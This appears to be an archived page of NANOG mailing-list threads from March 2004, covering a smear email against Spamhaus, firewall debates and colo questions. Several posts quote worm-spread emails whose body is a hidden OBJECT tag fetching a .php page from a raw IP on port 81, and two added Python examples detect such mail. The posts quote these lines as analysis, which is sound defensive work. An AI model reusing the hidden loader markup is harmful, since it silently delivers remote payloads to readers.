For some reason, Peter Schroebel was CC'ed. You can read more about him at http://www.spamhaus.org/rokso/listing.lasso?-op=cnspammer=Peter%20Schroebel%20-%20SMS/Fullport

Character attacks such as this one are pretty common against anti-spammers; we also had one attempted at Brian Bruns just days ago here on NANOG.

Regards
Thor Larholm
Senior Security Researcher
PivX Solutions
24 Corporate Plaza #180
Newport Beach, CA 92660
http://www.pivx.com
[EMAIL PROTECTED]
Phone: +1 (949) 231-8496
PGP: 0x5A276569 6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569

PivX defines Proactive Threat Mitigation. Get a FREE Beta Version of Qwik-Fix http://www.qwik-fix.net
RE: Strange message possibly through nanog mail server
At 04:58 PM 17/03/2004, Alon Tirosh wrote:

I *think* I loaded the page in lynx before it got rate-limited, and lynx flashed through a whole mess of fast redirects before faulting out. No logs, unfortunately.

A safe way I find to examine potentially trojaned pages is via fetch (or wget):

fetch -o questionable.html url

Then you can examine the page with appropriate tools.

---Mike
Re: net-co-op (was Re: who offers cheap (personal) 1U colo?)
net-co-op.org. ... Oh come on, what was .coop for if not this? :) People in the poultry business? :-) chicken.coop was sought for by many, myself included. The Director, Co-op Business Development and Member Services, National Cooperative Business Association, and I are now playing phone tag, so I expect to have some progress to report for a member-owned colo coop on a daily basis. It occurs to me that a member-owned colo coop is not necessarily location-dependent, nor uniquely valued. Eric
Re: Strange message possibly through nanog mail server
On Wednesday, March 17, 2004 5:57 PM [EST], william(at)elan.net [EMAIL PROTECTED] wrote:

I just received this. I would like to check if others have received it and did it indeed come through nanog mailist:

Date: Wed, 17 Mar 2004 21:10:38 +
From: Deep Throat [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Spamhaus Exposed

Disturbing information on one of the founders of Spamhaus.org http://www.geocities.com/jackjack9872004/
___

And while the website was unavailable and the sender is being anonymous (which is against nanog list policies if this was sent through it), what I do find worse is that they managed to do it so that [EMAIL PROTECTED] is not added to CC (which if I understood is always supposed to happen when something goes through this mail list, which makes me think it might have come through merit mail machine but not actually through mail list). What I find even more disturbing is that ip address listed as origin (which may well have been forged if they managed to gain some higher level access to merit servers) is that of US Military. Below is the header for your review. I do however find it slightly more likely that it's some kind of sophisticated joe-job on spamhaus and that info is forged but they may have used some bug on merit mail software.

I got it too. Let me throw some insight into this - notice the To line:

To: [EMAIL PROTECTED]

IIRC, that's Peter Schroebel, aka SMS Online. Peter has it out for Steve Linford of SpamHaus because SMS Online is listed for hosting spammers. He claims that SpamHaus wanted $10k from him to be removed. Peter tried to bribe the AHBL a few weeks ago to get us to remove him from our system. Peter likes to gloat about all the connections he has, and how powerful he is (though I have yet to see proof of this).

So, I'm not exactly sure what to make of this... It could be Peter, and the mirror of the page I've seen certainly makes it look like something he'd write. But, could be a joe job too.

--
Brian Bruns
The Summit Open Source Development Group
Open Solutions For A Closed World / Anti-Spam Resources
http://www.sosdg.org
The Abusive Hosts Blocking List
http://www.ahbl.org
Re: Spamhaus Exposed
From Deep Throat, received 17/3/04, 21:10 + (GMT): Disturbing information on one of the founders of Spamhaus.org http://www.geocities.com/jackjack9872004/ Not just a load of BS, but posted to NANOG anonymously, through a hijacked machine at 198.26.130.36 (The Pentagon) no less. -- Steve Linford The Spamhaus Project http://www.spamhaus.org
Re: Spamhaus Exposed
On Wed, 17 Mar 2004, Steve Linford wrote:

From Deep Throat, received 17/3/04, 21:10 + (GMT): Disturbing information on one of the founders of Spamhaus.org http://www.geocities.com/jackjack9872004/

Not just a load of BS, but posted to NANOG anonymously, through a hijacked machine at 198.26.130.36 (The Pentagon) no less.

federal interest site. that's automatic prison time, isn't it? i suspect the culprit could be prosecuted under PATRIOT, and sent away for quite a _long_ time...

-Dan
TCP header compression and CPU usage on Cisco AS5800
Hi folks.

On a cisco AS5800, what are the parameters that could be tweaked to reduce CPU utilization? With 360 active calls here's what I have:

NAS01-MTNDODS#sh proc cpu | exclude 0.00
CPU utilization for five seconds: 79%/17%; one minute: 81%; five minutes: 80%
 PID Runtime(ms)    Invoked      uSecs   5Sec   1Min   5Min TTY Process
   3    80428996    4609093      17450  2.19%  1.08%  0.78%   0 Check heaps
   7   147676920    1554810      94984  2.43%  4.42%  3.93%   0 Serial Backgroun
  29     8102432   16740884        483  0.08%  0.18%  0.18%   0 Net Background
  61    11903404    9770801       1218  0.24%  0.22%  0.23%   0 ISDN
  74   834975664 2098634624        397  7.72%  6.99%  6.93%   0 IP Input
  76     3189204    1447125       2203  0.08%  0.04%  0.04%   0 CDP Protocol
  79      665792    8520105         78  0.16%  0.13%  0.10%   0 IP Background
  91      795916    2427196        327  0.08%  0.19%  0.23%   0 PPP IP Route
  92    31107300    5726565       5432 38.09% 45.42% 45.05%   0 PPP IPCP
 120    80886604    2196656      36822  0.73%  0.74%  0.74%   0 Compute load avg
 148    32705256  345451242         94  4.30%  2.52%  2.07%   0 PPP Events
 156     3841144   63989161         60  0.08%  0.06%  0.03%   0 IP SNMP
 158     8978492   27800036        322  0.16%  0.26%  0.16%   0 SNMP ENGINE
 210   222569208    2670597      83340  5.60%  5.39%  4.83%   0 AAA Per-User

As you see that IPCP process takes ~ 45% of the CPU. Is there a way to disable TCP header compression completely? Or any other CPU intensive things? It's an AS5800 with NPE-300.

Thanx
Paul

Paul Khavkine
Network Administrator
DISTRIBUTEL Communications.
740 Notre Dame West, Suite 1135
Montreal, Quebec, Canada, H3C 3X6
1-514-877-5505 x 263
http://www.distributel.net
Re: Firewall opinions wanted please
the primary purpose of a firewall is to keep the bad guys away from the buggy code. Firewalls are the networks' response to the host security problem.

a pretty good sound bite. :)

Add to that that you don't really know what's safe or unsafe, and that you have some services that are convenient for insiders but don't have adequate, scalable authentication on which you can build an authorization mechanism, and you see why firewalls are useful. Perfect? No, of course not. A good idea? Absolutely.

Er... perhaps. Who is configuring the firewall? What are its capabilities? How easy will it be to deploy new services? I, as an enduser, am abdicating most of my responsibility to or it is being hijacked by one or more network service providers. Ken is right. Firewalls, in general, seem to be a great place for blackhats to focus on. DoS is trivial, the degenerate case is encaps of everything into stuff that passes through the firewall (IP over port 80), and then we've just pushed the problem elsewhere, adding more complexity to the system for little if any improvement in the overall integrity. Sounds like the result is a system that is more fragile.

--Steve Bellovin, http://www.research.att.com/~smb

--bill (cynic)
Noting that the nanog thread of the day has changed, but not n'cessly for the better. :)
Question on possibly using route switch as standby backup to router
(On topic to nanog for a change...)

I'll be soon going through resetup of one of our primary hosting POPs (moving to different DC and upstream provider) and as a result have opportunity to make some changes to the configuration, etc and want to set it up so there is standby backup available to the main router. Note that I'm not going to setup complete cisco HSRP, I don't have interest in going this far. The only purpose is to provide service for customers in the POP for short period of time in case of router failure or when router has to be taken down for upgrades. And while the router itself has direct connections to other routers on our network, I'm fine with network being split into segments while the router is down, I do however want customers in that POP to be able to use the primary upstream in that POP (and I'll as a result need to announce only the ip blocks related to that segment in case router goes down).

The concept I have in mind is to use our main cisco switch there that also happened to have a router card and could I think do bgp. The idea is to connect one or two upstream GB connections directly into the switch (currently we connect to upstream through port on the router) and then setup vlans from there to go to the router through its gigabit interface (most likely etherchannel logically on the router to be able to expand to multiple interfaces if it is ever needed). Further, instead of doing typical /30 interconnect to upstream, I would like to use /29 there and assign one ip to their router, one to our router and one ip would be on route switch card (which can see each vlan as separate interface).

For BGP instead of establishing session directly between interfaces of one and another router, I want to use separate /30 that would be announced to upstream through EBGP (but not go beyond just between these routers) and this /30 would contain ip address to be used for primary BGP session for announcing our routes (for those familiar this is how cogent does it). The idea is then that when everything is working and primary router is ok, it will announce this /30 and bgp ip to upstream and thereafter be able to establish bgp session and send all the routes there, but if router is down, same /30 begins to be announced by route switch which could take over routing.

Now my main config problem here is that I need a way to have main router announce something to route switch that would suppress its announcement of this same /30 through ebgp. Additionally I need to find a way to let the individual customer servers (these on separate vlans connected from the router and through the switch, each vlan has one ip on the main router and one on the route-switch vlan) know which is the correct default gateway. In theory I can of course have route-switch always be the default router for those customer machines, but I'd like to avoid this and use router instead. And you have to remember here also that while some customer machines are linux and solaris and can talk ospf and receive default router through that, many servers are windows and I really really would like to avoid using IGP routing protocol on microsoft software. So if possible I'd like to completely avoid using IGP protocol for sending default and try doing it some other way.

Any suggestions on above two items? Did any of you do anything similar and perhaps documented it somewhere?

P.S. My router is 7500. The route switch is currently 5500 with RSM card, but I may be upgrading to 6500 switch soon, but would like the setup to work on either one.

--
William Leibzon
Elan Networks
[EMAIL PROTECTED]
Re: Firewall opinions wanted please
On Wed, Mar 17, 2004 at 03:01:50PM -0800, bill said something to the effect of:

the primary purpose of a firewall is to keep the bad guys away from the buggy code. Firewalls are the networks' response to the host security problem.

a pretty good sound bite. :)

Add to that that you don't really know what's safe or unsafe, and that you have some services that are convenient for insiders but don't have adequate, scalable authentication on which you can build an authorization mechanism, and you see why firewalls are useful. Perfect? No, of course not. A good idea? Absolutely.

Er... perhaps. Who is configuring the firewall? What are its capabilities?

You are. Your network engineer is. The needs of your network and staff dictate the demands and deploy a mechanism suitable enough to satisfy them. This is not a question others can answer for you in the hypothetical.

How easy will it be to deploy new services? I, as an enduser,

That will depend on the services. If you ask most to stream Kazaa into your cube at work, they'll laugh at you. If you want to route jellybeans-over-IP, you'll likely not be considered. If you're at the helm at the office or at home, then it's as easy as you make it and you can do what you want within the scope of your provider's AUP.. Again...competent security engineer...comes to mind...

am abdicating most of my responsibility to or it is being hijacked by one or more network service providers. Ken is right.

This is the job of the edge/customer/network administrator, or a 3rd party agent contracted to provide managed security services. Most NSPs do not do this (granular filtering) unless engaged (and paid) directly by the customer. Is that what has your dander up? This is the job/responsibility/whim of the subscriber, for the most part.

Firewalls, in general, seem to be a great place for blackhats to focus on.

What? No...unprotected systems are the great places for blackhats to focus on. Where are you getting this?

I apologize for sounding potentially antagonistic, but I am having a difficult time discerning between devil's advocacy and counterintuition in your opinions regarding secure network praxes. Single points of failure are prime targets for attack, too, by the way. As are unchecked portals and ingress vectors. Eschewing security mechanisms (physical, logical, DR, etc) contribute to both.

DoS is trivial,

Please tell me you did not just go there... Network outage is not trivial. Not ever. One more time...where are you getting your information? That clause is patently incorrect. Please remember virii and node subversion when you head in that direction, as well, as granular security is not just about DoS...

the degenerate case is encaps of everything into stuff that passes through the firewall (IP over port 80), and then we've just pushed the problem

What kind of firewall are you talking about? Who does this?

elsewhere, adding more complexity to the system for little if any improvement in the overall integrity. Sounds like the result is a system that is more fragile.

Broken record...from where did you derive this information? And how better do you propose to restrict access to a network than filtering/firewalling or somesuch similar level of access control? Or is it (as you have not yet answered this) your position that a network should remain open and unsecured? Not your service provider's network...but networks in general. What, in no uncertain terms, do you believe belongs keeping watch over your network perimeter? Also, what constitutes acceptable loss and/or outage in your organization? It is entirely possible and I am increasingly hopeful that you and I are simply talking about 2 totally separate things.

For the record...the top 2 Achilles' heels to network security are improperly-protected edge devices (i.e., web servers, unpatched desktops, unsecured routers, etc), and protocol-related vulnerabilities (i.e., SNMP, DNS/BIND). Your concern for thwarted network application development leads me to enlist you and yours to fix inherently weak protocols (SMTP, for example) to make networking itself again more robust before I agree to see a security layer as superfluous. And then there are software purveyors to visit.

--ra

--
k. rachael treu, CISSP
[EMAIL PROTECTED]
..quis custodiet ipsos custodes?..

--Steve Bellovin, http://www.research.att.com/~smb

--bill (cynic)
Noting that the nanog thread of the day has changed, but not n'cessly for the better. :)
Re: Spamhaus Exposed
I believe under USC18 there is a section that clearly states hacking a government computer can get you a maximum of 30 years in federal prison and a $250,000.00 fine. Please correct me if that postscription of law has been vacated.

-Henry

Dan Hollis [EMAIL PROTECTED] wrote:

On Wed, 17 Mar 2004, Steve Linford wrote:

From Deep Throat, received 17/3/04, 21:10 + (GMT): Disturbing information on one of the founders of Spamhaus.org http://www.geocities.com/jackjack9872004/

Not just a load of BS, but posted to NANOG anonymously, through a hijacked machine at 198.26.130.36 (The Pentagon) no less.

federal interest site. that's automatic prison time, isn't it? i suspect the culprit could be prosecuted under PATRIOT, and sent away for quite a _long_ time...

-Dan
Tracing packets (was Re: Spamhaus Exposed)
On Wed, 17 Mar 2004, Steve Linford wrote:

From Deep Throat, received 17/3/04, 21:10 + (GMT): Disturbing information on one of the founders of Spamhaus.org http://www.geocities.com/jackjack9872004/

Not just a load of BS, but posted to NANOG anonymously, through a hijacked machine at 198.26.130.36 (The Pentagon) no less.

Has that actually been confirmed? Any machine associated with the path could have been compromised, including systems with transitive trust which may not appear in the e-mail headers. Occam's Razor would say the message most likely did originate where it says it originated. But when I just checked it wasn't listed in any of the major block lists of compromised hosts (spamcop does list it as a spam source), and the Pentagon hasn't confirmed the computer was compromised.
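To make the point above concrete (which Received lines a recipient can actually vouch for, and where the chain turns into somebody else's claim), here is an added Python example; it is not code from anyone on this thread. It walks the Received chain quoted earlier in the thread, reconstructed here as a sample with the redacted recipient replaced by an example.net placeholder, and assumes the recipient trusts only its own inbound MTA and the two merit.edu list hosts.

```python
import re

# Constructed sample: the Received chain quoted on this thread for the
# "Spamhaus Exposed" message, most recent hop first as in a real message.
# The redacted recipient address is replaced by an example.net placeholder;
# the relays and IPs are the ones quoted on the list.
SAMPLE_HEADERS = """\
Received: from trapdoor.merit.edu (trapdoor.merit.edu [198.108.1.26])
    by sokol.elan.net (8.12.5/8.12.5) with ESMTP id i2HMKZdw015368
    for <recipient@example.net>; Wed, 17 Mar 2004 14:20:35 -0800
Received: by trapdoor.merit.edu (Postfix) id CF8FA91307;
    Wed, 17 Mar 2004 16:11:00 -0500 (EST)
Received: by trapdoor.merit.edu (Postfix, from userid 56) id 92B3591328;
    Wed, 17 Mar 2004 16:11:00 -0500 (EST)
Received: from segue.merit.edu (segue.merit.edu [198.108.1.41])
    by trapdoor.merit.edu (Postfix) with ESMTP id BCC5691307;
    Wed, 17 Mar 2004 16:10:39 -0500 (EST)
Received: by segue.merit.edu (Postfix) id A27775DE7B;
    Wed, 17 Mar 2004 16:10:39 -0500 (EST)
Received: from hotmail.com (bay13-f78.bay13.hotmail.com [64.4.31.78])
    by segue.merit.edu (Postfix) with ESMTP id 5C2B05DE72;
    Wed, 17 Mar 2004 16:10:39 -0500 (EST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
    Wed, 17 Mar 2004 13:10:38 -0800
Received: from 198.26.130.36 by by13fd.bay13.hotmail.msn.com with HTTP;
    Wed, 17 Mar 2004 21:10:38 GMT
X-Originating-IP: [198.26.130.36]
Subject: Spamhaus Exposed
"""

# MTAs whose Received lines this recipient vouches for (assumption): its own
# inbound host plus the two list hosts at merit.edu. Hotmail is not on it.
TRUSTED_MTAS = frozenset({"sokol.elan.net", "trapdoor.merit.edu", "segue.merit.edu"})

FROM_RE = re.compile(r"^from\s+(.+?)\s+by\s+", re.I)
BY_RE = re.compile(r"\bby\s+(\S+)", re.I)
IP_RE = re.compile(r"\[?(\d{1,3}(?:\.\d{1,3}){3})\]?")


def unfold(raw):
    """Join folded header lines (continuations start with whitespace)."""
    lines = []
    for line in raw.splitlines():
        if line[:1] in (" ", "\t") and lines:
            lines[-1] += " " + line.strip()
        elif line.strip():
            lines.append(line.rstrip())
    return lines


def parse_received(value):
    """Pull the claimed sender, its address literal, and the receiving host."""
    value = value.split(";", 1)[0]          # drop the timestamp
    from_m = FROM_RE.match(value)           # anchored: "(Postfix, from userid 56)" is not a hop
    by_m = BY_RE.search(value)
    from_clause = from_m.group(1) if from_m else ""
    ip_m = IP_RE.search(from_clause)
    return {
        "from": from_clause.split(" (", 1)[0] or None,
        "from_ip": ip_m.group(1) if ip_m else None,
        "by": by_m.group(1).lower() if by_m else None,
    }


def trace(raw, trusted_mtas=TRUSTED_MTAS):
    """Label each hop 'verified' while the chain runs through trusted MTAs only.

    The first hop recorded by an MTA we do not operate breaks the chain: that
    line and every older one below it are merely claimed by whoever wrote them.
    """
    hops, chain_intact = [], True
    for line in unfold(raw):
        name, _, value = line.partition(":")
        if name.strip().lower() != "received":
            continue
        hop = parse_received(value.strip())
        if hop["by"] not in trusted_mtas:
            chain_intact = False
        hop["status"] = "verified" if chain_intact else "claimed"
        hops.append(hop)
    return hops


def last_verified_origin(hops):
    """Address a trusted MTA really accepted the connection from."""
    ips = [h["from_ip"] for h in hops if h["status"] == "verified" and h["from_ip"]]
    return ips[-1] if ips else None


def claimed_origin(hops):
    """Address the oldest Received line asserts; only as good as its author."""
    ips = [h["from_ip"] for h in hops if h["from_ip"]]
    return ips[-1] if ips else None


if __name__ == "__main__":
    hops = trace(SAMPLE_HEADERS)
    for h in hops:
        print(f'{h["status"]:8} from {h["from"]!s:22} [{h["from_ip"]}] by {h["by"]}')
    print("last verifiable origin:", last_verified_origin(hops))
    print("claimed origin:", claimed_origin(hops))
```

With only the recipient's and the list's MTAs trusted, the last verifiable origin is Hotmail's 64.4.31.78; the Pentagon address becomes a "verified" origin only if you also choose to trust Hotmail's own Received lines.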
Re: Firewall opinions wanted please
In message [EMAIL PROTECTED], bill writes:

the primary purpose of a firewall is to keep the bad guys away from the buggy code. Firewalls are the networks' response to the host security problem.

a pretty good sound bite. :)

Thanks -- I've been using that line for about 10 years, and I haven't gotten tired of it yet

Add to that that you don't really know what's safe or unsafe, and that you have some services that are convenient for insiders but don't have adequate, scalable authentication on which you can build an authorization mechanism, and you see why firewalls are useful. Perfect? No, of course not. A good idea? Absolutely.

Er... perhaps. Who is configuring the firewall? What are its capabilities? How easy will it be to deploy new services? I, as an enduser, am abdicating most of my responsibility to or it is being hijacked by one or more network service providers. Ken is right.

I don't have time to participate in this thread any more tonight -- tomorrow is the biweekly IESG call, and I still have several documents to review -- but I never said that ISPs should implement firewalls. In fact, in general that's a bad idea. Firewalls are the instantiation of a security policy; I don't want my ISP telling me what my security policy is or should be. To be sure, there is a market for a value-added ISP service that provides assorted types of filtering. But that's the sort of thing that's best done by consenting adults.

More later

--Steve Bellovin, http://www.research.att.com/~smb
Re: Update on Querying IADB
[EMAIL PROTECTED] [17/03/04 17:34 +]:

The codes we use at present include: 127.0.0.1 Listed in IADB

Hmmm... listed in my /etc/hosts as well. Am I IADB compliant?

Am I missing something or isn't this a standard dns block / white list implementation? I don't run a large public dnsbl but I do serve out dnsbl zones for my own use. Should dns{b|w}ls be deployed using LDAP / SOAP now?

srs
Re: Spamhaus Exposed
In message [EMAIL PROTECTED], Henry Linneweh writes:

I believe under USC18 there is a section that clearly states hacking a government computer can get you a maximum of 30 years in federal prison and a $250,000.00 fine Please correct me if that postscription of law has been vacated.

I don't think so, but my browser isn't rendering some of the characters correctly at http://www4.law.cornell.edu/uscode/18/1030.html

--Steve Bellovin, http://www.research.att.com/~smb
Request response
now what - spam to nanog spoofing susan harris?
Mailed out through an open proxy / hacked machine in some australian museum, with a body that tries to load this html page - http://24.84.218.164:81/641280.php

Page is hosted on a shawcable connection (probably another trojaned box) that I can't seem to access, though the host is barely pingable

srs

Return-Path: [EMAIL PROTECTED]
Received: from trapdoor.merit.edu (trapdoor.merit.edu [198.108.1.26]) by corpmail.outblaze.com (Postfix) with ESMTP id B199316DD9F; Thu, 18 Mar 2004 02:43:17 + (GMT)
Received: by trapdoor.merit.edu (Postfix) id 6E9DA91333; Wed, 17 Mar 2004 21:40:47 -0500 (EST)
Received: by trapdoor.merit.edu (Postfix, from userid 56) id 35AD791331; Wed, 17 Mar 2004 21:40:47 -0500 (EST)
Received: from segue.merit.edu (segue.merit.edu [198.108.1.41]) by trapdoor.merit.edu (Postfix) with ESMTP id 724909132F for [EMAIL PROTECTED]; Wed, 17 Mar 2004 21:40:44 -0500 (EST)
Received: by segue.merit.edu (Postfix) id 5A6015DE6E; Wed, 17 Mar 2004 21:40:44 -0500 (EST)
Received: from PH02887.net (unknown [203.18.63.43]) by segue.merit.edu (Postfix) with SMTP id 8220D5DE34 for [EMAIL PROTECTED]; Wed, 17 Mar 2004 21:40:43 -0500 (EST)
Delivered-To: [EMAIL PROTECTED]
Delivered-To: [EMAIL PROTECTED]
Delivered-To: [EMAIL PROTECTED]
Date: Thu, 18 Mar 2004 13:40:35 +1000
To: [EMAIL PROTECTED]
Subject: Request response
From: [EMAIL PROTECTED]
Message-ID: [EMAIL PROTECTED]
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: [EMAIL PROTECTED]
Precedence: bulk
Errors-To: [EMAIL PROTECTED]
X-Loop: nanog
X-AntiVirus: checked by Vexira MailArmor (version: 2.0.1.11; VAE: 6.24.0.7; VDF: 6.24.0.61; host: corpmail.outblaze.com)

htmlbody font face=System OBJECT STYLE=display:none DATA=http://24.84.218.164:81/641280.php; /OBJECT/body/html
Re: Request response
Erm, something is definitely up tonight. Message is below, for those of you who didn't want to touch this message. I can't get to the site listed in the message, so I have no idea what it's trying to deliver exactly. Anyone care to comment?

--
Brian Bruns
The Summit Open Source Development Group
Open Solutions For A Closed World / Anti-Spam Resources
http://www.sosdg.org
The Abusive Hosts Blocking List
http://www.ahbl.org

Return-path: [EMAIL PROTECTED]
Envelope-to: [EMAIL PROTECTED]
Delivery-date: Wed, 17 Mar 2004 21:41:31 -0500
Received: from trapdoor.merit.edu ([198.108.1.26] ident=postfix) by mail.sosdg.org with esmtp (Exim 4.30) id 1B3nTO-00021v-N6; Wed, 17 Mar 2004 21:41:30 -0500
Received: by trapdoor.merit.edu (Postfix) id 6E9DA91333; Wed, 17 Mar 2004 21:40:47 -0500 (EST)
Delivered-To: [EMAIL PROTECTED]
Received: by trapdoor.merit.edu (Postfix, from userid 56) id 35AD791331; Wed, 17 Mar 2004 21:40:47 -0500 (EST)
Delivered-To: [EMAIL PROTECTED]
Received: from segue.merit.edu (segue.merit.edu [198.108.1.41]) by trapdoor.merit.edu (Postfix) with ESMTP id 724909132F for [EMAIL PROTECTED]; Wed, 17 Mar 2004 21:40:44 -0500 (EST)
Received: by segue.merit.edu (Postfix) id 5A6015DE6E; Wed, 17 Mar 2004 21:40:44 -0500 (EST)
Delivered-To: [EMAIL PROTECTED]
Received: from PH02887.net (unknown [203.18.63.43]) by segue.merit.edu (Postfix) with SMTP id 8220D5DE34 for [EMAIL PROTECTED]; Wed, 17 Mar 2004 21:40:43 -0500 (EST)
Date: Thu, 18 Mar 2004 13:40:35 +1000
To: [EMAIL PROTECTED]
From: [EMAIL PROTECTED]
Message-ID: [EMAIL PROTECTED]
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.
Sender: [EMAIL PROTECTED]
Precedence: bulk
Errors-To: [EMAIL PROTECTED]
X-Loop: nanog
X-Scan-Signature: 0642888b67059a54bfdd4dcbc5a4659b
X-SA-Exim-Connect-IP: 198.108.1.26
X-SA-Exim-Mail-From: [EMAIL PROTECTED]
Subject: Request response
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Spam-Checker-Version: SpamAssassin 2.63 (2004-01-11) on everest.sosdg.org
X-Spam-Level: ***
X-Spam-Status: No, hits=7.0 required=9.0 tests=BAYES_01,DCC_CHECK, FORGED_MUA_OUTLOOK,FORGED_OUTLOOK_TAGS,HTML_MESSAGE,MIME_HTML_ONLY, NORMAL_HTTP_TO_IP,NO_REAL_NAME,WEIRD_PORT autolearn=no version=2.63
X-Spam-Report:
 * 0.2 NO_REAL_NAME From: does not include a real name
 * -1.5 BAYES_01 BODY: Bayesian spam probability is 1 to 10%
 * [score: 0.0600]
 * 0.1 HTML_MESSAGE BODY: HTML included in message
 * 0.3 MIME_HTML_ONLY BODY: Message only has text/html MIME parts
 * 0.1 NORMAL_HTTP_TO_IP URI: Uses a dotted-decimal IP address in URL
 * 1.4 WEIRD_PORT URI: Uses non-standard port number for HTTP
 * 2.9 DCC_CHECK Listed in DCC (http://rhyolite.com/anti-spam/dcc/)
 * 1.0 FORGED_OUTLOOK_TAGS Outlook can't send HTML in this format
 * 2.6 FORGED_MUA_OUTLOOK Forged mail pretending to be from MS Outlook
X-SA-Exim-Version: 4.0 (built Tue, 16 Mar 2004 14:56:42 -0500)
X-SA-Exim-Scanned: Yes (on mail.sosdg.org)
Status:

htmlbody font face=System OBJECT STYLE=display:none DATA=http://24.84.218.164:81/641280.php; /OBJECT/body/html
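As an added example (not code from anyone on the thread), a small Python scanner for the kind of body quoted above: it looks for OBJECT/IFRAME/EMBED/SCRIPT tags that pull remote content while hidden, and flags the same URL properties SpamAssassin's NORMAL_HTTP_TO_IP and WEIRD_PORT tests scored. The sample body is constructed from the one quoted on the list, with the angle brackets the archive stripped put back.

```python
import re
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample: the body of the "Request response" message as quoted
# on the list, with the angle brackets the archive stripped put back.
SAMPLE_SPAM_BODY = """<html><body><font face=System>
<OBJECT STYLE=display:none DATA="http://24.84.218.164:81/641280.php"></OBJECT>
</body></html>"""

# Constructed benign sample: a visible object on a named host, standard port.
SAMPLE_CLEAN_BODY = """<html><body><p>Slides from the meeting:</p>
<object data="https://www.example.org/slides.svg" type="image/svg+xml"></object>
</body></html>"""

# Elements that load remote content, and the attribute carrying the URL.
REMOTE_ATTR = {"object": "data", "iframe": "src", "embed": "src", "script": "src"}
HIDDEN_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


class _RemoteContentCollector(HTMLParser):
    """Collects every tag that loads remote content, with its URL and style."""

    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):      # html.parser lowercases tag/attr names
        attr_name = REMOTE_ATTR.get(tag)
        if attr_name is None:
            return
        attrs = {k.lower(): (v or "") for k, v in attrs}
        url = attrs.get(attr_name, "").strip()
        if url:
            self.found.append({"tag": tag, "url": url, "style": attrs.get("style", "")})


def url_flags(url):
    """Return the suspicious properties of a URL (empty list if none)."""
    flags = []
    parts = urlsplit(url)
    host = parts.hostname
    if host:
        try:
            ipaddress.ip_address(host)
            flags.append("ip_literal_host")      # cf. SpamAssassin NORMAL_HTTP_TO_IP
        except ValueError:
            pass
    try:
        port = parts.port
    except ValueError:
        port = -1                                # unparsable port counts as odd
    if port not in (None, 80, 443):
        flags.append("nonstandard_port")         # cf. SpamAssassin WEIRD_PORT
    return flags


def scan_html(body):
    """Findings for remote-content tags that are hidden or fetch from odd URLs."""
    parser = _RemoteContentCollector()
    parser.feed(body)
    parser.close()
    findings = []
    for item in parser.found:
        flags = url_flags(item["url"])
        if HIDDEN_RE.search(item["style"]):
            flags.append("hidden")
        if flags:
            findings.append({"tag": item["tag"], "url": item["url"], "flags": sorted(flags)})
    return findings


def is_suspect(body):
    """True when the body silently pulls remote content from a suspicious URL."""
    return any("hidden" in f["flags"] and len(f["flags"]) > 1 for f in scan_html(body))


if __name__ == "__main__":
    for name, body in (("spam", SAMPLE_SPAM_BODY), ("clean", SAMPLE_CLEAN_BODY)):
        print(name, is_suspect(body), scan_html(body))
```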
Personal Co-location Registry
http://www.vix.com/personalcolo/

notes:
(1) even in germany they call them 19 inch racks, thus setting the clock back several decades.
(2) i'm very interested in listing more non-US locations
(3) i'm interested in listing more locations, period
(4) further additions, or any changes, should be sent in HTML source format
(5) what a great community -- i've learned a LOT in the last four days!
Protected message
Re: Personal Co-location Registry
In message [EMAIL PROTECTED], Paul Vixie writes:

http://www.vix.com/personalcolo/

notes:
(1) even in germany they call them 19 inch racks, thus setting the clock back several decades.
(2) i'm very interested in listing more non-US locations
(3) i'm interested in listing more locations, period
(4) further additions, or any changes, should be sent in HTML source format
(5) what a great community -- i've learned a LOT in the last four days!

Thanks -- an excellent resource. One thing you may want to devote a bit more text to: what are typical provisions for remote hands at these places? In the intro, you allude to that as a problem with home-located machines, but I have no idea what the colo facilities do in such cases.

Btw -- in Seoul, I noticed that some TV sets there have their screen size measured in inches. The contamination is spreading...

--Steve Bellovin, http://www.research.att.com/~smb
Re: Hi (fwd)
Methinks somebody has found a trapdoor in nanog mailsetup and is in general out to get us ...

This one supposedly came from 203.18.63.43 (australia powerhouse museum - phm.gov.au) and advertises page on ip 165.134.187.102 (saint louis university - slu.edu). Connection refused when I tried to see what's there.

-- Forwarded message --
Return-Path: [EMAIL PROTECTED]
Received: from trapdoor.merit.edu (trapdoor.merit.edu [198.108.1.26]) ...
Received: by segue.merit.edu (Postfix) id 3B2ED5DE4F; Wed, 17 Mar 2004 23:04:48 -0500 (EST)
Delivered-To: [EMAIL PROTECTED]
Received: from PH02887.net (unknown [203.18.63.43]) by segue.merit.edu (Postfix) with SMTP id 0AE2E5DE32 for [EMAIL PROTECTED]; Wed, 17 Mar 2004 23:04:46 -0500 (EST)
Date: Thu, 18 Mar 2004 15:04:22 +1000
To: [EMAIL PROTECTED]
Subject: Re: Hi
From: [EMAIL PROTECTED]
Message-ID: [EMAIL PROTECTED]
...
htmlbody font face=System OBJECT STYLE=display:none DATA=http://165.134.187.102:81/132847.php; /OBJECT/body/html
Re: Hi (fwd)
In message [EMAIL PROTECTED], william(a t)elan.net writes: Me thinks somebody has found a trapdoor in nanog mailsetup and is in general out to get us ... This one supposedely came from 203.18.63.43 (australia powerhous museum - phm.gov.au) and advertises page on ip 165.134.187.102 (saint louis univerisity - slu.edu). Connection refused when I tried to see what's there. No -- I'm pretty sure it's a worm. Of the 20 copies I've received -- in just the last 3 hours -- only three have been via the NANOG list. On the bright side, Spamassassin 2.63's default settings seem to kill this one. In fact, it was only by accident that I even noticed them. --Steve Bellovin, http://www.research.att.com/~smb
Re: Hi (fwd)
william(at)elan.net writes on 3/18/2004 11:03 AM:

> Methinks somebody has found a trapdoor in the NANOG mail setup and is in general out to get us ...

